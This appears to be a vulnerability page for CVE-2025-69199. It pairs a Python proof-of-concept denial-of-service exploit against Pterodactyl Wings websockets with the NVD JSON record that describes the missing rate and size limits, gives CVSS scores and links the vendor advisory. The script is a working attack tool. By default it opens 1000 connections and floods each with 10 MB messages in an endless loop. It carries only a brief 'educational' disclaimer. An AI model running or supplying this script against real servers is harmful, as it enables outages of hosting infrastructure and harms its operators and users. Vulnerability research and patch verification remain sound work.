CVE-2025-69199

#!/usr/bin/env python3 """ CVE-2025-69199 PoC - Pterodactyl Wings WebSocket DoS Note: This PoC is for educational and authorized testing purposes only. """ import asyncio import websockets import json import argparse from datetime import datetime async def exploit(target_url, num_connections, message_size): """ Simulate the DoS attack by creating many websocket connections and sending large messages to exhaust server resources. """ print(f"[*] Starting CVE-2025-69199 exploit against {target_url}") print(f"[*] Target: {num_connections} connections, {message_size} bytes per message") connections = [] large_message = "A" * message_size async def create_websocket_session(uri): """Create a websocket connection and send large messages.""" try: async with websockets.connect(uri, ping_interval=None) as ws: # Send authentication (if required) auth_data = {"event": "auth", "data": {"token": "test_token"}} await ws.send(json.dumps(auth_data)) # Continuously send large messages while True: await ws.send(large_message) await asyncio.sleep(0.1) # Small delay between messages except Exception as e: print(f"[-] Connection error: {e}") # Create multiple websocket connections tasks = [] for i in range(num_connections): task = asyncio.create_task(create_websocket_session(target_url)) tasks.append(task) print(f"[*] Created connection {i+1}/{num_connections}") await asyncio.sleep(0.01) # Stagger connection creation print(f"[*] All {num_connections} connections established") print(f"[*] Attack in progress... Press Ctrl+C to stop") try: await asyncio.gather(*tasks) except KeyboardInterrupt: print("\n[!] Attack stopped by user") for task in tasks: task.cancel() if __name__ == "__main__": parser = argparse.ArgumentParser(description="CVE-2025-69199 PoC") parser.add_argument("--target", default="ws://localhost:8080/ws", help="Target websocket URL") parser.add_argument("--connections", type=int, default=1000, help="Number of connections") parser.add_argument("--message-size", type=int, default=10485760, help="Message size in bytes (default: 10MB)") args = parser.parse_args() asyncio.run(exploit(args.target, args.connections, args.message_size))

{"cve": {"id": "CVE-2025-69199", "sourceIdentifier": "[email protected]", "published": "2026-01-19T20:15:48.370", "lastModified": "2026-02-02T20:41:13.750", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Wings is the server control plane for Pterodactyl, a free, open-source game server management panel. Prior to version 1.12.0, websockets within wings lack proper rate limiting and throttling. As a result a malicious user can open a large number of connections and then request data through these sockets, causing an excessive volume of data over the network and overloading the host system memory and cpu. Additionally, there is not a limit applied to the total size of messages being sent or received, allowing a malicious user to open thousands of websocket connections and then send massive volumes of information over the socket, overloading the host network, and causing increased CPU and memory load within Wings. Version 1.12.0 patches the issue."}, {"lang": "es", "value": "Wings es el plano de control del servidor para Pterodactyl, un panel de gestión de servidores de juegos gratuito y de código abierto. Antes de la versión 1.12.0, los websockets dentro de Wings carecen de una adecuada limitación de velocidad y estrangulamiento. Como resultado, un usuario malintencionado puede abrir un gran número de conexiones y luego solicitar datos a través de estos sockets, causando un volumen excesivo de datos en la red y sobrecargando la memoria y la CPU del sistema anfitrión. Además, no se aplica un límite al tamaño total de los mensajes enviados o recibidos, lo que permite a un usuario malintencionado abrir miles de conexiones websocket y luego enviar volúmenes masivos de información a través del socket, sobrecargando la red del anfitrión y causando una mayor carga de CPU y memoria dentro de Wings. La versión 1.12.0 corrige el problema."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:H/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.3, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "HIGH", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-400"}, {"lang": "en", "value": "CWE-770"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-770"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:pterodactyl:wings:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.12.0", "matchCriteriaId": "D0892774-9788-48C8-A188-A1A6373735F0"}]}]}], "references": [{"url": "https://github.com/pterodactyl/panel/security/advisories/GHSA-8w7m-w749-rx98", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}